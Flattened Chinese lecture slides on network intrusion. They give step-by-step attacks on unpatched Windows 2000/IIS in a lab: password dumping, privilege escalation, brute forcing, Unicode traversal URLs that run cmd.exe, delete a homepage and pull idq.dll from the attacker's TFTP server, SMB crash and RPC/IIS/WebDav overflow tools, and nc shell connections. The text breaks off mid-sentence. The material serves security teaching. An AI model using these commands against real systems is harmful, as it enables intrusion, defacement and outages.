計(jì)算機(jī)網(wǎng)絡(luò)安全.ppt

第五章網(wǎng)絡(luò)入侵 5 內(nèi)容提要 本章是攻擊技術(shù)中最重要的一章 介紹目前常用的網(wǎng)絡(luò)攻擊手段 社會工程學(xué)攻擊物理攻擊暴力攻擊利用Unicode漏洞攻擊利用緩沖區(qū)溢出漏洞進(jìn)行攻擊等技術(shù) 并結(jié)合實(shí)際 介紹流行的攻擊工具的使用以及部分工具的代碼實(shí)現(xiàn) 社會工程學(xué)攻擊 社交工程是使用計(jì)謀和假情報(bào)去獲得密碼和其他敏感信息的科學(xué) 研究一個(gè)站點(diǎn)的策略其中之一就是盡可能多的了解這個(gè)組織的個(gè)體 因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息 舉個(gè)例子 一組高中學(xué)生曾經(jīng)想要進(jìn)入一個(gè)當(dāng)?shù)氐墓镜挠?jì)算機(jī)網(wǎng)絡(luò) 他們擬定了一個(gè)表格 調(diào)查看上去顯得是無害的個(gè)人信息 例如所有秘書和行政人員和他們的配偶 孩子的名字 這些從學(xué)生轉(zhuǎn)變成的黑客說這種簡單的調(diào)查是他們社會研究工作的一部分 利用這份表格這些學(xué)生能夠快速的進(jìn)入系統(tǒng) 因?yàn)榫W(wǎng)絡(luò)上的大多數(shù)人是使用寵物和他們配偶名字作為密碼 社會工程學(xué)攻擊 目前社會工程學(xué)攻擊主要包括兩種方式 打電話請求密碼和偽造Email1 打電話請求密碼盡管不像前面討論的策略那樣聰明 打電話尋問密碼也經(jīng)常奏效 在社會工程中那些黑客冒充失去密碼的合法雇員 經(jīng)常通過這種簡單的方法重新獲得密碼 2 偽造Email使用telnet一個(gè)黑客可以截取任何一個(gè)身份證發(fā)送Email的全部信息 這樣的Email消息是真的 因?yàn)樗l(fā)自于一個(gè)合法的用戶 在這種情形下這些信息顯得是絕對的真實(shí) 黑客可以偽造這些 一個(gè)冒充系統(tǒng)管理員或經(jīng)理的黑客就能較為輕松的獲得大量的信息 黑客就能實(shí)施他們的惡意陰謀 物理攻擊與防范 物理安全是保護(hù)一些比較重要的設(shè)備不被接觸 物理安全比較難防 因?yàn)楣敉鶃碜阅軌蚪佑|到物理設(shè)備的用戶 案例5 1得到管理員密碼 用戶登錄以后 所有的用戶信息都存儲在系統(tǒng)的一個(gè)進(jìn)程中 這個(gè)進(jìn)程是 winlogon exe 可以利用程序?qū)?dāng)前登錄用戶的密碼解碼出來 如圖5 1所示 案例5 1得到管理員密碼 使用FindPass等工具可以對該進(jìn)程進(jìn)行解碼 然后將當(dāng)前用戶的密碼顯示出來 將FindPass exe拷貝到C盤根目錄 執(zhí)行該程序 將得到當(dāng)前用戶得登錄名 如圖5 2所示 權(quán)限提升 有時(shí)候 管理員為了安全 給其他用戶建立一個(gè)普通用戶帳號 認(rèn)為這樣就安全了 其實(shí)不然 用普通用戶帳號登錄后 可以利用工具GetAdmin exe將自己加到管理員組或者新建一個(gè)具有管理員權(quán)限的用戶 案例5 2普通用戶建立管理員帳號 利用Hacker帳戶登錄系統(tǒng) 在系統(tǒng)中執(zhí)行程序GetAdmin exe 程序自動(dòng)讀取所有用戶列表 在對話框中點(diǎn)擊按鈕 New 在框中輸入要新建的管理員組的用戶名 如圖5 5所示 普通用戶建立管理員帳號 輸入一個(gè)用戶名 IAMHacker 點(diǎn)擊按鈕 確定 以后 然后點(diǎn)擊主窗口的按鈕 OK 出現(xiàn)添加成功的窗口 如圖5 6所示 暴力攻擊 暴力攻擊的一個(gè)具體例子是 一個(gè)黑客試圖使用計(jì)算機(jī)和信息去破解一個(gè)密碼 一個(gè)黑客需要破解 段單一的被用非對稱密鑰加密的信息 為了破解這種算法 一個(gè)黑客需要求助于非常精密復(fù)雜的方法 它使用120個(gè)工作站 兩個(gè)超級計(jì)算機(jī)利用從三個(gè)主要的研究中心獲得的信息 即使擁有這種配備 它也將花掉八天的時(shí)間去破解加密算法 實(shí)際上破解加密過程八天已是非常短暫的時(shí)間了 字典文件 一次字典攻擊能否成功 很大因素上決定與字典文件 一個(gè)好的字典文件可以高效快速的得到系統(tǒng)的密碼 攻擊不同的公司 不通地域的計(jì)算機(jī) 可以根據(jù)公司管理員的姓氏以及家人的生日 可以作為字典文件的一部分 公司以及部門的簡稱一般也可以作為字典文件的一部分 這樣可以大大的提高破解效率 一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件 其中的每一行就代表一個(gè)可能的密碼 目前有很多工具軟件專門來創(chuàng)建字典文件 圖5 8是一個(gè)簡單的字典文件 暴力破解操作系統(tǒng)密碼 字典文件為暴力破解提供了一條捷徑 程序首先通過掃描得到系統(tǒng)的用戶 然后利用字典中每一個(gè)密碼來登錄系統(tǒng) 看是否成功 如果成功則將密碼顯示案例5 3暴力破解操作系統(tǒng)密碼比如使用圖5 8所示的字典文件 利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來 如圖5 9所示 暴力破解郵箱密碼 郵箱的密碼一般需要設(shè)置到八位以上 否則七位以下的密碼容易被破解 尤其七位全部是數(shù)字 更容易被破解 案例5 4電子郵箱暴力破解破解電子郵箱密碼 一個(gè)比較著名的工具軟件是 黑雨 POP3郵箱密碼暴力破解器 比較穩(wěn)定的版本是2 3 1 主界面如圖5 10所示 暴力破解軟件密碼 目前許多軟件都具有加密的功能 比如Office文檔 Winzip文檔和Winrar文檔等等 這些文檔密碼可以有效的防止文檔被他人使用和閱讀 但是如果密碼位數(shù)不夠長的話 同樣容易被破解 案例5 5Office文檔暴力破解 修改權(quán)限密碼 在對話框中選擇選項(xiàng)卡 安全性 在打開權(quán)限密碼和修改權(quán)限密碼的兩個(gè)文本框中都輸入 999 如圖5 12所示 輸入密碼 保存并關(guān)閉該文檔 然后再打開 就需要輸入密碼了 如圖5 13所示 破解Word文檔密碼 該密碼是三位的 使用工具軟件 AdvancedOfficeXPPasswordRecovery可以快速破解Word文檔密碼 主界面如圖5 14所示 破解Word文檔密碼 點(diǎn)擊工具欄按鈕 OpenFile 打開剛才建立的Word文檔 程序打開成功后會在LogWindow中顯示成功打開的消息 如圖5 15所示 破解Word文檔密碼 設(shè)置密碼長度最短是一位 最長是三位 點(diǎn)擊工具欄開始的圖標(biāo) 開始破解密碼 大約兩秒鐘后 密碼被破解了 如圖5 16所示 Unicode漏洞專題 通過打操作系統(tǒng)的補(bǔ)丁程序 就可以消除漏洞 只要是針對漏洞進(jìn)行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補(bǔ)丁 Unicode漏洞是2000 10 17發(fā)布的 受影響的版本 MicrosoftIIS5 0 MicrosoftWindows2000系列版本MicrosoftIIS4 0 MicrosoftWindowsNT4 0消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁 只要安裝了SP1以后 該漏洞就不存在了 微軟IIS4 0和5 0都存在利用擴(kuò)展UNICODE字符取代 和 而能利用 目錄遍歷的漏洞 Unicode漏洞的檢測方法 使用掃描工具來檢測Unicode漏洞是否存在 使用上一章介紹的X Scan來對目標(biāo)系統(tǒng)進(jìn)行掃描 目標(biāo)主機(jī)IP為 172 18 25 109 Unicode漏洞屬于IIS漏洞 所以這里只掃描IIS漏洞就可以了 X Scan設(shè)置如圖5 17所示 Unicode漏洞的檢測方法 將主機(jī)添加到目標(biāo)地址 掃描結(jié)果如圖5 18所示 Unicode漏洞的檢測方法 可以看出 存在許多系統(tǒng)的漏洞 只要是 scripts開頭的漏洞都是Unicode漏洞 比如 scripts c0 2f winnt system32 cmd exe c dir其中 scripts目錄是IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄 在IIS中的位置如圖5 19所示 Unicode漏洞的檢測方法 scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下 如圖5 20所示 Unicode漏洞的檢測方法 在Windows的目錄結(jié)構(gòu)中 可以使用兩個(gè)點(diǎn)和一個(gè)斜線 來訪問上一級目錄 在瀏覽器中利用 scripts 可以訪問到系統(tǒng)盤根目錄 訪問 scripts winnt system32 就訪問到系統(tǒng)的系統(tǒng)目錄了 在system32目錄下包含許多重要的系統(tǒng)文件 比如cmd exe文件 可以利用該文件新建用戶 刪除文件等操作 瀏覽器地址欄中禁用符號 但是可以使用符號 的Unicode的編碼 比如 scripts c0 2f winnt system32 cmd exe c dir 中的 c0 2f 就是 的Unicode編碼 這條語句是執(zhí)行dir命令列出目錄結(jié)構(gòu) Unicode漏洞 此漏洞從中文IIS4 0 SP6開始 還影響中文WIN2000 IIS5 0 中文WIN2000 IIS5 0 SP1 臺灣繁體中文也同樣存在這樣的漏洞 在NT4中 編碼為 c1 9c 或者 c1 9c WIN2000英文版是 c0 af 但從國外某些站點(diǎn)得來的資料顯示 還有以下的編碼可以實(shí)現(xiàn)對該漏洞的檢測 該編碼存在于日文版 韓文版等操作系統(tǒng) c1 pc c0 9v c0 qf c1 8s e0 80 af利用該漏洞讀取出計(jì)算機(jī)上目錄列表 比如讀取C盤的目錄 只要在瀏覽器中輸入 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c dir c 利用Unicode漏洞讀取系統(tǒng)盤目錄 利用Unicode漏洞讀取系統(tǒng)盤目錄 利用語句得到對方計(jì)算機(jī)上裝了幾個(gè)操作系統(tǒng)以及操作系統(tǒng)的類型 只要讀取C盤下的boot ini文件就可以了 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c type c boot ini執(zhí)行的結(jié)果如圖5 22所示 利用Unicode漏洞刪除主頁 利用Unicode可以方便的更改對方的主頁 比如現(xiàn)在已經(jīng)知道對方網(wǎng)站的根路徑在 C Initpub wwwroot 系統(tǒng)默認(rèn) 下 可以刪除該路徑下的文件 default asp 來刪除主頁 這里的 default asp 文件是IIS的默認(rèn)啟動(dòng)頁面 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c del c inetpub wwwroot default asp 利用Unicode漏洞刪除主頁 拷貝文件 為了是使用方便 利用語句將cmd exe文件拷貝到scripts目錄 并改名為c exe 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c copy C winnt system32 cmd exe c exe程序執(zhí)行結(jié)果如圖5 24所示 查看C盤的目錄 以后使用cmd exe命令就方便了 比如查看C盤的目錄 使用的語句就可以簡化為 http 172 18 25 109 scripts c exe c dir c 執(zhí)行的結(jié)果如圖5 25所示 利用Unicode漏洞入侵系統(tǒng) 在地址欄上執(zhí)行命令 用戶的權(quán)限比較低 像net等系統(tǒng)管理指令不能執(zhí)行 利用Unicode可以入侵對方的系統(tǒng) 并得到管理員權(quán)限 首先需要向?qū)Ψ椒?wù)器上傳一些文件 入侵的第一步 建立tftp服務(wù)器 向?qū)Ψ降膕cripts文件夾傳幾個(gè)文件 需要上傳一個(gè)名為 idq dll 的文件 為了上傳這個(gè)文件 首先在本地計(jì)算機(jī)上搭建一個(gè)TFTP服務(wù)器 普通文件傳輸協(xié)議TFTP TextFileTransmissionProtocol 一般用來傳輸單個(gè)文件 使用工具軟件tftpd32 exe建立服務(wù)器 將idq dll和tftpd32 exe放在本地的同一目錄下 執(zhí)行tftpd32 exe程序 主界面如圖5 26所示 利用Unicode漏洞入侵系統(tǒng) 利用Unicode漏洞入侵系統(tǒng) 這樣在本地的TFTP的服務(wù)器就建立好了 保留這個(gè)窗口 通過該服務(wù)器向?qū)Ψ絺鬟fidq dll文件 在瀏覽器中執(zhí)行命令 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c tftp i 172 18 25 110 get idq dll 命令其實(shí)是 tftp i172 18 25 110getidq dll 意思是從172 18 25 110服務(wù)器上獲取idq dll文件 執(zhí)行成功的界面如圖5 27所示 上載文件 查看scripts目錄 上傳完畢后可以查看一下scripts目錄 是否真的上傳成功了 如圖5 28所示 入侵對方主機(jī) 說明已經(jīng)成功的在scripts目錄中上傳了一個(gè)idq dll文件 下面使用工具軟件ispc exe入侵對方系統(tǒng) 拷貝ispc exe文件到本地計(jì)算機(jī)的C盤根目錄 在DOS命令行下執(zhí)行命令 ispc exe172 18 25 109 scripts idq dll 連接成功后就直接進(jìn)入了對方的DOS命令行下 而且具有管理員權(quán)限 入侵的過程5 29所示 建立用戶 可以在對方計(jì)算機(jī)上做管理員可以做的一切事情 比如添加用戶 建立一個(gè)用戶名為 Hacker123 密碼也是 Hacker123 的用戶 如圖5 30所示 其他漏洞攻擊 利用打印漏洞利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管理員權(quán)限的用戶 經(jīng)過測試 該漏洞在SP2 SP3以及SP4版本上依然存在 但是不能保證100 入侵成功 使用工具軟件 cniis exe 使用的語法格式是 cniis172 18 25 1090 第一個(gè)參數(shù)是目標(biāo)的IP地址 第二參數(shù)是目標(biāo)操作系統(tǒng)的補(bǔ)丁號 因?yàn)?72 18 25 109沒有打補(bǔ)丁 這里就是0 拷貝cniis exe文件到C盤根目錄 執(zhí)行程序如圖5 31所示 SMB致命攻擊 SMB SessionMessageBlock 會話消息塊協(xié)議 又叫做NetBIOS或LanManager協(xié)議 用于不同計(jì)算機(jī)之間文件 打印機(jī) 串口和通訊的共享和用于Windows平臺上提供磁盤和打印機(jī)的共享 SMB協(xié)議版本有很多種 在Windows98 WindowsNT Windows2000和XP使用的是NTLM0 12版本 利用該協(xié)議可以進(jìn)行各方面的攻擊 比如可以抓取其他用戶訪問自己計(jì)算機(jī)共享目錄的SMB會話包 然后利用SMB會話包登錄對方的計(jì)算機(jī) 下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動(dòng)或者藍(lán)屏 致命攻擊 使用的工具軟件是 SMBDieV1 0 該軟件對打了SP3 SP4的計(jì)算機(jī)依然有效 必須打?qū)ｉT的SMB補(bǔ)丁 軟件的主界面如圖5 32所示 致命攻擊 攻擊的時(shí)候 需要兩個(gè)參數(shù) 對方的IP地址和對方的機(jī)器名 窗口中分別輸入這兩項(xiàng) 如圖5 33所示 致命攻擊 然后再點(diǎn)按鈕 Kill 如果參數(shù)輸入沒有錯(cuò)誤的話 對方計(jì)算機(jī)立刻重啟或藍(lán)屏 命中率幾乎100 被攻擊的計(jì)算機(jī)藍(lán)屏界面如圖5 34所示 緩沖區(qū)溢出攻擊 目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊 當(dāng)目標(biāo)操作系統(tǒng)收到了超過了它的最大能接收的信息量的時(shí)候 將發(fā)生緩沖區(qū)溢出 這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出 然后覆蓋了實(shí)際的程序數(shù)據(jù) 緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改 經(jīng)過這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個(gè)后門 這項(xiàng)攻擊對技術(shù)要求比較高 但是攻擊的過程卻非常簡單 緩沖區(qū)溢出原理很簡單 比如程序 緩沖區(qū)溢出攻擊 voidfunction char szPara1 charbuff 16 strcpy buffer szPara1 程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中 只要szPara1的長度大于16 就會造成緩沖區(qū)溢出 存在strcpy函數(shù)這樣問題的C語言函數(shù)還有 strcat gets scanf 等 RPC漏洞溢出 遠(yuǎn)程過程調(diào)用RPC RemoteProcedureCall 是操作系統(tǒng)的一種消息傳遞功能 允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計(jì)算機(jī) 當(dāng)系統(tǒng)啟動(dòng)的時(shí)候 自動(dòng)加載RPC服務(wù) 可以在服務(wù)列表中看到系統(tǒng)的RPC服務(wù) 如圖5 35所示 利用RPC漏洞建立超級用戶 RPC溢出漏洞 對SP4也適用 必須打?qū)Ｓ醚a(bǔ)丁 利用工具scanms exe文件檢測RPC漏洞 該工具是ISS安全公司2003年7月30日發(fā)布的 運(yùn)行在命令行下用來檢測指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了 DCOMRPC接口遠(yuǎn)程緩沖區(qū)溢出漏洞 823980 MS03 026 補(bǔ)丁程序 如果沒有安裝補(bǔ)丁程序 該IP地址就會顯示出 VULN 首先拷貝該文件到C盤根目錄 現(xiàn)在要檢查地址段172 18 25 109到172 18 25 110的主機(jī) 執(zhí)行命令 scanms exe172 18 25 109 172 18 25 110 檢查過程如圖5 36所示 檢查緩沖區(qū)溢出漏洞 檢查緩沖區(qū)溢出漏洞 利用工具軟件attack exe對172 18 25 109進(jìn)行攻擊 攻擊的結(jié)果將在對方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶 并終止了對方的RPC服務(wù) 新建用戶的用戶名和密碼都是qing10 這樣就可以登錄對方計(jì)算機(jī)了 RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用 非常容易被管理員發(fā)現(xiàn) 使用工具軟件OpenRpcSs exe來給對方重啟RPC服務(wù) 攻擊的全過程如圖5 37所示 攻擊的全過程 利用IIS溢出進(jìn)行攻擊 案例5 11利用IIS溢出入侵系統(tǒng)利用軟件SnakeIIS溢出工具可以讓對方的IIS溢出 還可以捆綁執(zhí)行的命令和在對方計(jì)算機(jī)上開辟端口 工具軟件的主界面如圖5 38所示 利用IIS溢出進(jìn)行攻擊 該軟件適用于各種類型的操作系統(tǒng) 比如對172 18 25 109進(jìn)行攻擊 172 18 25 109的操作系統(tǒng)的Windows2000 沒有安裝補(bǔ)丁程序 攻擊完畢后 開辟一個(gè)813端口 并在對方計(jì)算機(jī)上執(zhí)行命令 dirc 設(shè)置如圖5 39所示 點(diǎn)擊按鈕 IDQ溢出 出現(xiàn)攻擊成功的提示框 如圖5 40所示 這個(gè)時(shí)候 813端口已經(jīng)開放 利用工具軟件nc exe連接到該端口 將會自動(dòng)執(zhí)行改才發(fā)送的DOS命令 dirc 使用的語法是 nc exe vv172 18 25 109813 其中 vv是程序的參數(shù) 813是目標(biāo)端口 可以看到命令的執(zhí)行結(jié)果 如圖5 41所示 監(jiān)聽本地端口 下面利用nc exe和snake工具的另外一種組合入侵對方計(jì)算機(jī) 首先利用nc exe命令監(jiān)聽本地的813端口 使用的基本語法是 nc l p813 執(zhí)行的過程如圖5 42所示 這個(gè)窗口就這樣一直保留 啟動(dòng)工具軟件snake 本地的IP地址是172 18 25 110 要攻擊的計(jì)算機(jī)的IP地址是172 18 25 109 選擇溢出選項(xiàng)中的第一項(xiàng) 設(shè)置IP為本地IP地址 端口是813 如圖5 43所示 設(shè)置好以后 點(diǎn)擊按鈕 IDQ溢出 程序顯示對話框如圖4 44所示 查看nc命令的DOS框 在該界面下 已經(jīng)執(zhí)行了設(shè)置的DOS命令 將對方計(jì)算機(jī)的C盤根目錄列出來 如圖4 45所示 利用WebDav遠(yuǎn)程溢出 需要使用工具軟件nc exe和webdavx3 exe 首先在DOS命令行下執(zhí)行webdavx3 exe 如果執(zhí)行的話 該程序?qū)⑻崾疽呀?jīng)過期了 如圖4 46所示 攻擊 修改本地系統(tǒng)時(shí)間到2001年 這樣就可以攻擊了 在命令后面直接跟對方的IP地址就可以了 現(xiàn)在要攻擊的計(jì)算機(jī)是172 18 25 109 執(zhí)行情況如圖4 47所示 入侵對方的計(jì)算機(jī) 該程序不能自動(dòng)退出 當(dāng)發(fā)現(xiàn)程序長時(shí)間沒有反映的時(shí)候 需要手工按下 CTRL C 退出程序 該程序在對方的計(jì)算機(jī)上開了一個(gè)端口7788 依然可以nc exe程序入侵對方的計(jì)算機(jī) 過程如圖4 48所示 拒絕服務(wù)攻擊 拒絕服務(wù)攻擊的簡稱是 DoS DenialofService 攻擊 凡是造成目標(biāo)計(jì)算機(jī)拒絕提供服務(wù)的攻擊都稱為DoS攻擊 其目的是使目標(biāo)計(jì)算機(jī)或網(wǎng)絡(luò)無法提供正常的服務(wù) 最常見的DoS攻擊是 計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊 帶寬攻擊是以極大的通信量沖擊網(wǎng)絡(luò) 使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉 最后導(dǎo)致合法用戶的請求無法通過 連通性攻擊指用大量的連接請求沖擊計(jì)算機(jī) 最終導(dǎo)致計(jì)算機(jī)無法再處理合法用戶的請求 案例5 13程序分析 案例5 13程序分析利用緩